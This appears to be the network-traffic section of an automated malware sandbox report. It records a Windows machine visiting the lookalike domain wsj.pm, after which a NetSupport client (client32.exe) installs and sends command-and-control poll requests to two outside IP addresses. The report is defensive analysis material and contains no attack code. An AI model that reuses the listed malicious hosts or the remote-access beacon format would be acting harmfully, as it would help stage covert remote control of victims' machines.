                                                                                                                Apr 25, 2024 17:00:24.375627041 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.375668049 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.375761032 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.376014948 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.376055002 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.601500034 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:24.602819920 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:24.602916956 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006347895 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006428957 CEST4434981023.133.88.190192.168.2.17
                                                                                                                Apr 25, 2024 17:00:25.006511927 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:25.006824970 CEST49810443192.168.2.1723.133.88.190
                                                                                                                Apr 25, 2024 17:00:30.418003082 CEST44349701204.79.197.200192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425158024 CEST44349806108.177.122.106192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425226927 CEST44349806108.177.122.106192.168.2.17
                                                                                                                Apr 25, 2024 17:00:31.425295115 CEST49806443192.168.2.17108.177.122.106
                                                                                                                Apr 25, 2024 17:00:32.605912924 CEST49806443192.168.2.17108.177.122.106
                                                                                                                Apr 25, 2024 17:00:32.605946064 CEST44349806108.177.122.106192.168.2.17

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Apr 25, 2024 16:58:16.293147087 CEST5188353192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:16.293380976 CEST5148553192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:16.353939056 CEST5832853192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:16.354167938 CEST5685053192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:16.402578115 CEST53497791.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:16.463212967 CEST53617001.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:16.623064041 CEST53518831.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:16.723532915 CEST53514851.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:16.777924061 CEST53583281.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:17.090152025 CEST53518981.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:17.119618893 CEST53568501.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:18.934890032 CEST6460153192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:18.935177088 CEST5917153192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.045685053 CEST53646011.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.045809984 CEST53591711.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.050304890 CEST53576821.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.574255943 CEST6040553192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.574465036 CEST6117353192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.575073957 CEST5106953192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.575370073 CEST6322253192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.575702906 CEST6007053192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.575865030 CEST5785853192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:19.684766054 CEST53604051.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.684806108 CEST53611731.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.907211065 CEST53632221.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:19.937031031 CEST53510691.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:20.086261988 CEST53600701.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:20.632042885 CEST53578581.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:21.066613913 CEST5385353192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:21.066967964 CEST5087953192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST53538531.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:21.178540945 CEST53508791.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:34.179841042 CEST53554181.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:53.017231941 CEST53606891.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:54.114423037 CEST5223253192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:54.114527941 CEST5747753192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:58:54.461880922 CEST53574771.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:58:54.550862074 CEST53522321.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:15.379435062 CEST53545111.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:16.353283882 CEST53526521.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:35.579524994 CEST138138192.168.2.17192.168.2.255
                                                                                                                Apr 25, 2024 16:59:36.058567047 CEST6479053192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:59:36.282074928 CEST53647901.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:38.117964983 CEST5335053192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:59:38.282634020 CEST53533501.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:43.745218039 CEST53590461.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:45.780488014 CEST6066253192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:59:45.893496037 CEST53606621.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 16:59:58.759903908 CEST5294553192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 16:59:58.872452974 CEST53529451.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 17:00:28.511542082 CEST53579541.1.1.1192.168.2.17
                                                                                                                Apr 25, 2024 17:00:43.473124981 CEST6254353192.168.2.171.1.1.1
                                                                                                                Apr 25, 2024 17:00:43.584562063 CEST53625431.1.1.1192.168.2.17

                                                                                                                ICMP Packets

                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                Apr 25, 2024 16:58:16.723617077 CEST192.168.2.171.1.1.1c22f(Port unreachable)Destination Unreachable
                                                                                                                Apr 25, 2024 16:58:20.632138014 CEST192.168.2.171.1.1.1c22f(Port unreachable)Destination Unreachable

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Apr 25, 2024 16:58:16.293147087 CEST192.168.2.171.1.1.10x744eStandard query (0)wsj.pmA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:16.293380976 CEST192.168.2.171.1.1.10xa652Standard query (0)wsj.pm65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:16.353939056 CEST192.168.2.171.1.1.10xb5c4Standard query (0)wsj.pmA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:16.354167938 CEST192.168.2.171.1.1.10x559bStandard query (0)wsj.pm65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:18.934890032 CEST192.168.2.171.1.1.10x1de4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:18.935177088 CEST192.168.2.171.1.1.10x7aa0Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.574255943 CEST192.168.2.171.1.1.10x4c31Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.574465036 CEST192.168.2.171.1.1.10x9267Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.575073957 CEST192.168.2.171.1.1.10xdadaStandard query (0)cdn40.clickA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.575370073 CEST192.168.2.171.1.1.10x21e6Standard query (0)cdn40.click65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.575702906 CEST192.168.2.171.1.1.10xfe04Standard query (0)wsj.pmA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.575865030 CEST192.168.2.171.1.1.10xae6Standard query (0)wsj.pm65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.066613913 CEST192.168.2.171.1.1.10xedf7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.066967964 CEST192.168.2.171.1.1.10x46ceStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:54.114423037 CEST192.168.2.171.1.1.10x2502Standard query (0)cdn40.clickA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:54.114527941 CEST192.168.2.171.1.1.10x9e79Standard query (0)cdn40.click65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:36.058567047 CEST192.168.2.171.1.1.10x50ceStandard query (0)cdn40.clickA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:38.117964983 CEST192.168.2.171.1.1.10x100dStandard query (0)cdn37.spaceA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:45.780488014 CEST192.168.2.171.1.1.10xba98Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:58.759903908 CEST192.168.2.171.1.1.10x728Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 17:00:43.473124981 CEST192.168.2.171.1.1.10x7af0Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Apr 25, 2024 16:58:16.623064041 CEST1.1.1.1192.168.2.170x744eNo error (0)wsj.pm103.113.70.37A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:16.777924061 CEST1.1.1.1192.168.2.170xb5c4No error (0)wsj.pm103.113.70.37A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.045685053 CEST1.1.1.1192.168.2.170x1de4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.045685053 CEST1.1.1.1192.168.2.170x1de4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.045685053 CEST1.1.1.1192.168.2.170x1de4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.045809984 CEST1.1.1.1192.168.2.170x7aa0No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.684766054 CEST1.1.1.1192.168.2.170x4c31No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.684766054 CEST1.1.1.1192.168.2.170x4c31No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.684766054 CEST1.1.1.1192.168.2.170x4c31No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.684806108 CEST1.1.1.1192.168.2.170x9267No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:19.937031031 CEST1.1.1.1192.168.2.170xdadaNo error (0)cdn40.click23.133.88.190A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:20.086261988 CEST1.1.1.1192.168.2.170xfe04No error (0)wsj.pm103.113.70.37A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.106A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.147A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.99A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.104A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.103A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178195000 CEST1.1.1.1192.168.2.170xedf7No error (0)www.google.com108.177.122.105A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:21.178540945 CEST1.1.1.1192.168.2.170x46ceNo error (0)www.google.com65IN (0x0001)false
                                                                                                                Apr 25, 2024 16:58:54.550862074 CEST1.1.1.1192.168.2.170x2502No error (0)cdn40.click23.133.88.190A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:36.282074928 CEST1.1.1.1192.168.2.170x50ceNo error (0)cdn40.click23.133.88.190A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:38.282634020 CEST1.1.1.1192.168.2.170x100dNo error (0)cdn37.space86.104.72.157A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:45.893496037 CEST1.1.1.1192.168.2.170xba98No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:45.893496037 CEST1.1.1.1192.168.2.170xba98No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:45.893496037 CEST1.1.1.1192.168.2.170xba98No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:58.872452974 CEST1.1.1.1192.168.2.170x728No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:58.872452974 CEST1.1.1.1192.168.2.170x728No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 16:59:58.872452974 CEST1.1.1.1192.168.2.170x728No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 17:00:43.584562063 CEST1.1.1.1192.168.2.170x7af0No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 17:00:43.584562063 CEST1.1.1.1192.168.2.170x7af0No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                Apr 25, 2024 17:00:43.584562063 CEST1.1.1.1192.168.2.170x7af0No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • wsj.pm
                                                                                                                • https:
                                                                                                                  • api.ipify.org
                                                                                                                  • cdn40.click
                                                                                                                • slscr.update.microsoft.com
                                                                                                                • fs.microsoft.com
                                                                                                                • login.live.com
                                                                                                                • evoke-windowsservices-tas.msedge.net
                                                                                                                • www.bing.com
                                                                                                                • cdn37.space
                                                                                                                • 5.8.63.140connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                • 185.174.102.62connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                • geo.netsupportsoftware.com

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.1749716103.113.70.37806544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:01.826615095 CEST6OUTData Raw: 00
                                                                                                                Data Ascii:


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.1749717103.113.70.37806544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:01.828567028 CEST6OUTData Raw: 00
                                                                                                                Data Ascii:


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.17498005.8.63.1404437408C:\ProgramData\netsupport\client\client32.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:45.823282957 CEST212OUTPOST http://5.8.63.140/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.8.63.140Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                Data Raw:
                                                                                                                Data Ascii:


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.1749801185.174.102.624437408C:\ProgramData\netsupport\client\client32.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:45.912662029 CEST220OUTPOST http://185.174.102.62/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.174.102.62Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                Data Raw:
                                                                                                                Data Ascii:


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.1749802104.26.0.231807408C:\ProgramData\netsupport\client\client32.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:46.013895035 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Apr 25, 2024 16:59:46.390033007 CEST924INHTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:46 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32e4f9eb7b94-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                                                Apr 25, 2024 16:59:46.390058994 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.1749804104.26.0.231807408C:\ProgramData\netsupport\client\client32.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:46.524363995 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Apr 25, 2024 16:59:46.912189007 CEST916INHTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:46 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32e82dd844fb-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                                                Apr 25, 2024 16:59:46.912214994 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.1749805104.26.0.231807408C:\ProgramData\netsupport\client\client32.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Apr 25, 2024 16:59:47.024605036 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                Host: geo.netsupportsoftware.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Apr 25, 2024 16:59:47.398869038 CEST926INHTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:47 GMT
                                                                                                                Content-Type: text/html; charset=us-ascii
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                CF-Ray: 879f32eb4ea069f2-ATL
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                cf-apo-via: origin,host
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                                                Apr 25, 2024 16:59:47.398886919 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.1749718103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC649OUTGET / HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
